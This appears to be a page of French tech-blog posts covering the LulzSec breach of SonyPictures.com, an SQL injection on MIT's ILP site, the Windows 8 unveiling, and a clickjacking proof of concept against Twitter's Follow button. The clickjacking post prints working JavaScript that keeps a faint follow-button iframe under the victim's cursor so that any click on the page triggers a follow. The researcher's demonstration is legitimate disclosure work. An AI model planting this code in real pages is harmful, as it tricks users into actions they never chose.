La grêle continue de tomber sur Sony avec ce 10ème piratage en 2 mois. Et cette fois c’est à Lulzsec qu’on le doit… Ils ont mis la main sur plus d’un million de comptes utilisateurs du site SonyPictures.com. Email, mot de passe, adresse postale, date de naissance, ainsi que des infos commerciales… Tout y est !

Mais ce n’est pas tout. Lulzsec a aussi récupéré les comptes des administrateurs et leurs mots de passe, ce qui leur a permis de constater que le (ou les ?) serveur tournaient avec un noyau linux non mis à jour et donc faillible lui aussi comme lors des piratages précédents. Ils ont aussi mis la main sur des millions de codes pour télécharger ou profiter de réducs sur de la musique. Comme pour le site du MIT, Sony a lui aussi été victime d’une injection SQL et bien sûr, les mots de passe des 1 000 000 de comptes étaient eux aussi en clair dans la base de données. Une partie de ces données sont maintenant téléchargeable un peu partout sur le net (y compris les réseaux p2p) et Lulzsec invite tout le monde à profiter des bons de réduction pour la musique. 🙂

Pas très sérieux tout ça, de la part de Sony… surtout en si peu de temps. En tout cas, toutes ces histoires ne vont pas arranger le cours de la bourse de la société.

[Source]

 

D’après des captures écrans postées sur Pastebin par un certain Cyber_Owner, il semblerait que le site ILP (International Liaison Program) du MIT ait été piraté. La faille serait une faille injection SQL qui donnerait accès à l’intégralité des données contenues en base.

Le programme de liaison du MIT a pour but de mettre en relation des sociétés du monde entier avec le MIT. Il y a plus de 170 sociétés concernées et si j’ai bien compris le but de ce site, tout ce petit monde semble s’échanger pas mal de données confidentielles sur des projets industriels ou de recherche.

Bref, ça craint !

D’après les captures postées par le pirate, on peut voir que cette base contient tous les noms, prénoms et n° de téléphone, logins des membres du programme du MIT mais on peut aussi imaginer qu’il n’y a pas que ça en base.

Autre information plutôt sensible, les mots de passes sont en clair dans la base de données (!!). Ce qui veut dire que le pirate a maintenant accès à tous les comptes utilisateurs et peut donc sans problème dérober des informations confidentielles.

Bouuuuh !

[Source]

Après les quelques leaks aperçu de ci de là, Windows 8 vient d’être officiellement dévoilé par Microsoft lors de la conf D9.

Et franchement, ça change ! Ce nouvel OS a été clairement conçu pour les interfaces tactiles et donc les tablettes sans oublier les ordinateurs classiques. C’est un gros mix entre une interface à la Windows 7 et à la Windows Phone 7.

Cette couche graphique à la WP7 semble très évoluée et permet à chacun d’organiser son bureau comme bon lui semble, que ce soit en terme de gestion de ses flux d’informations (météo, twitter, rss…etc) qu’en terme d’applications. D’ailleurs en parlant d’applications, celle-ci tourneront de manière assez classique (comme sous Windows 7 avec le menu Démarrer et tout le bordel), mais vous pourrez organiser votre bureau pour y placer les widgets de votre choix à côté de vos applications.

C’est beau, c’est fluide, on navigue entre les applis en glissant d’un écran à l’autre (avec son doigt par exemple), et même si j’ai des doutes sur le côté « optimisé pour le boulot » de cette interface, je ne peux que reconnaitre que Microsoft a pour une fois vraiment innové. Reste à voir à l’utilisation maintenant… mais ça semble plutôt cool !

J’ai l’impression de re-découvrir l’Active Desktop à l’époque de Windows 98 #troll !

D’après Microsoft, une release pour les dev est prévue en septembre et Windows 8 ne sera peut être pas le nom définitif…

J’ai vraiment hâte de le tester !!! J’vous laisse avec l’oncle Fétide pour la démo (à regarder en 1080p+fullscreen):

Merci à Nicolas pour l’info.

Peu de temps après la mise à disposition par Twitter d’un bouton « Follow » qui permet en 1 click de suivre quelqu’un sur Twitter, Pierre, un chercheur en sécurité a mis au point un proof of concept de click jacking assez fourbe. L’idée est qu’en masquant une iframe contenant un bouton de follow twitter, avec un petit coup de CSS et en en capturant avec du javascript les déplacements de la souris afin de positionner cette iframe sous le curseur de la victime, peu importe l’endroit où celle-ci clique dans la page, hop ça fera des followers de plus à l’attaquant.

Diabolique !

if (!document.getElementsByClassName){
 document.getElementsByClassName = function(classname){
   for (i=0; i < document.getElementsByTagName("*").length; i++)
    {
    if (document.getElementsByTagName("*").item(i).className == classname){
    return new Array(document.getElementsByTagName("*").item(i));
    }
  }
 }
}

var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';

document.onmousemove = function(e){
        if ( !e ) e = window.event;
        twitterFollowIframe.style.left = e.clientX - 20;
        twitterFollowIframe.style.top = e.clientY - 10;
}

Si vous voulez voir une démo live du PoC, cliquez ici. Il a mis la transparence à 40% pour que vous puissiez voir le bouton twitter sous votre souris, mais sachez qu’en la mettant à 100%, ce sera totalement invisible.

Oups 😉

Evidemment, comme vous me l’avez fait remarqué dans les commentaires, cette technique de click jacking peut aussi s’appliquer à d’autres choses comme le Like de Facebook ou le +1 de Google. Les système d’abonnement ou de vote 1 click seront toujours à la merci de ce genre de choses.

Merci à John Jean pour l’info

[Source et photo]

Voici une petite image qui résume bien comment chaque corps de métier se voit les uns les autres lorsqu’ils collaborent par exemple sur un projet. Il ne manque plus que la vision du « client » et ça sera parfait.

Merci à Christouilhe, fidèle lecteur de Korben.info !

[Source et photo]